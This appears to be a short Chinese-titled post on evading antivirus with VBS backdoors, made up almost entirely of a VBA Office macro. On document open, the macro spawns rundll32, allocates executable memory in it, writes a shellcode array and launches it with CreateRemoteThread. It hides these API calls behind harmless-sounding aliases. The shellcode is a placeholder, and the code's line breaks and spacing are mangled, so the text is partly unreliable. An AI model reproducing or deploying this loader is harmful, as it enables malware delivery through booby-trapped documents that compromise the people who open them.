VBS后門(mén)的免殺方式研究

Private Type PROCESS_INFORMATION  hProcess As Long  hThread As Long  dwProcessId As Long  dwThreadId As LongEnd TypePrivate Type STARTUPINFO  cb As Long  lpReserved As String  lpDesktop As String  lpTitle As String  dwX As Long  dwY As Long  dwXSize As Long  dwYSize As Long  dwXCountChars As Long  dwYCountChars As Long  dwFillAttribute As Long  dwFlags As Long  wShowWindow As Integer  cbReserved2 As Integer  lpReserved2 As Long  hStdInput As Long  hStdOutput As Long  hStdError As LongEnd Type#If VBA7 Then  Private Declare PtrSafe Function CreateStuff Lib "kernel32" Alias "CreateRemoteThread"(ByVal hProcess As Long, ByVal lpThreadAttributes As Long, ByVal dwStackSize As Long, ByVallpStartAddress As LongPtr, lpParameter As Long, ByVal dwCreationFlags As Long, lpThreadID AsLong) As LongPtr  Private Declare PtrSafe Function AllocStuff Lib "kernel32" Alias "VirtualAllocEx" (ByValhProcess As Long, ByVal lpAddr As Long, ByVal lSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr  Private Declare PtrSafe Function WriteStuff Lib "kernel32" Alias "WriteProcessMemory"(ByVal hProcess As Long, ByVal lDest As LongPtr, ByRef Source As Any, ByVal Length As Long, ByVal LengthWrote As LongPtr) As LongPtr  Private Declare PtrSafe Function RunStuff Lib "kernel32" Alias "CreateProcessA" (ByVallpApplicationName As String, ByVal lpCommandLine As String, lpProcessAttributes As Any,lpThreadAttributes As Any, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long,lpEnvironment As Any, ByVal lpCurrentDirectory As String, lpStartupInfo As STARTUPINFO,lpProcessInformation As PROCESS_INFORMATION) As Long#Else  Private Declare Function CreateStuff Lib "kernel32" Alias "CreateRemoteThread" (ByValhProcess As Long, ByVal lpThreadAttributes As Long, ByVal dwStackSize As Long, ByVallpStartAddress As Long, lpParameter As Long, ByVal dwCreationFlags As Long, lpThreadID AsLong) As Long  Private Declare Function AllocStuff Lib "kernel32" Alias "VirtualAllocEx" (ByVal hProcess AsLong, ByVal lpAddr As Long, ByVal lSize As Long, ByVal flAllocationType As Long, ByVal flProtect AsLong) As Long  Private Declare Function WriteStuff Lib "kernel32" Alias "WriteProcessMemory" (ByValhProcess As Long, ByVal lDest As Long, ByRef Source As Any, ByVal Length As Long, ByValLengthWrote As Long) As Long  Private Declare Function RunStuff Lib "kernel32" Alias "CreateProcessA" (ByVallpApplicationName As String, ByVal lpCommandLine As String, lpProcessAttributes As Any,lpThreadAttributes As Any, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long,lpEnvironment As Any, ByVal lpCurrentDriectory As String, lpStartupInfo As STARTUPINFO,lpProcessInformation As PROCESS_INFORMATION) As Long#End IfSub Auto_Open()  Dim myByte As Long, myArray As Variant, offset As Long  Dim pInfo As PROCESS_INFORMATION  Dim sInfo As STARTUPINFO  Dim sNull As String  Dim sProc As String#If VBA7 Then  Dim rwxpage As LongPtr, res As LongPtr#Else  Dim rwxpage As Long, res As Long#End IfmyArray = Array(xxx,xxxx,xxxx,xxx)  If Len(Environ("ProgramW6432")) > 0 Then  sProc = Environ("windir") & "\\SysWOW64\\rundll32.exe" Else  sProc = Environ("windir") & "\\System32\\rundll32.exe" End If  res = RunStuff(sNull, sProc, ByVal 0&, ByVal 0&, ByVal 1&, ByVal 4&, ByVal 0&, sNull, sInfo, pInfo)  rwxpage = AllocStuff(pInfo.hProcess, 0, UBound(myArray), &H1000, &H40)  For offset = LBound(myArray) To UBound(myArray)  myByte = myArray(offset)  res = WriteStuff(pInfo.hProcess, rwxpage + offset, myByte, 1, ByVal 0&)  Next offset      res = CreateStuff(pInfo.hProcess, 0, 0, rwxpage, 0, 0, 0)      End Sub  Sub AutoOpen()    Auto_Open  End Sub  Sub Workbook_Open()    Auto_Open  End Sub